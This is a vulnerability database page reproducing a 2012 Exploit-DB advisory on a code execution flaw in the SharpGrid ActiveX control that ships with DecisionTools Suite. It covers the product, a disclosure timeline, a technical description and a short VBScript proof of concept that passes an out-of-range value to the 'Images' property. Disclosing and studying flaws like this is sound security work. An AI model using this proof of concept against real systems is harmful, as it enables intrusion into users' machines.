Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DecisionTools SharpGrid - ActiveX Control Remote Code Execution

🗓️ 09 May 2012 00:00:00Reported by Francis ProvencherType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 49 Views

DecisionTools Suite for risk analysis and decision making in Microsoft Excel, SharpGrid ActiveX Control Code Execution Vulnerabilit

Code
#####################################################################################

Application:   DecisionTools SharpGrid ActiveX Control Code Execution Vulnerability
Platforms:     Windows 
Secunia:       SA48571  
Date:          2012-05-09
Author:        Francis Provencher (Protek Research Lab's) 
Website:       http://www.protekresearchlab.com/
Twitter:       @ProtekResearch

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC


#####################################################################################

===============
1) Introduction
===============
The DecisionTools Suite is an integrated set of programs for risk analysis and decision making
under uncertainty that runs in Microsoft Excel. The DecisionTools Suite includes @RISK for
Monte Carlo simulation, PrecisionTree for decision trees, and TopRank for “what if” sensitivity analysis.
In addition, the DecisionTools Suite comes with StatTools for statistical analysis and forecasting,
NeuralTools for predictive neural networks, and Evolver and RISKOptimizer for optimization.
All programs work together better than ever before, and all integrate completely with
Microsoft Excel for ease of use and maximum flexibility.
 
http://www.palisade.com/decisiontools_suite/
#####################################################################################

============================
2) Report Timeline
============================

2012-03-26  Vulnerability reported to Secunia
2012-05-09  Publication of this advisory 


#####################################################################################

============================
3) Technical details
============================
 
The vulnerability is caused due to the "Images" property in the SharpGrid ActiveX control
insecurely using the assigned value as an image list pointer and can be exploited to call a
virtual function within an arbitrary memory location.
 

#####################################################################################

===========
4) POC
===========

<object classid='clsid:5BAADB36-D13B-4708-B8E6-7FACF1BF6783' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\Common Files\Data Dynamics\Sharpgrid\sg20u.ocx"
prototype  = "Property Let Images As Long"
memberName = "Images"
progid     = "DDSharpGrid2U.SGGrid"
argCount   = 1
arg1=2147483647
target.Images = arg1

</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 May 2012 00:00Current
7.4High risk
Vulners AI Score7.4
decisiontools suiterisk analysisdecision makingmicrosoft excelsharpgridactivex controlcode executionvulnerabilitywindowssecuniaremote code executionimage propertymemory location
49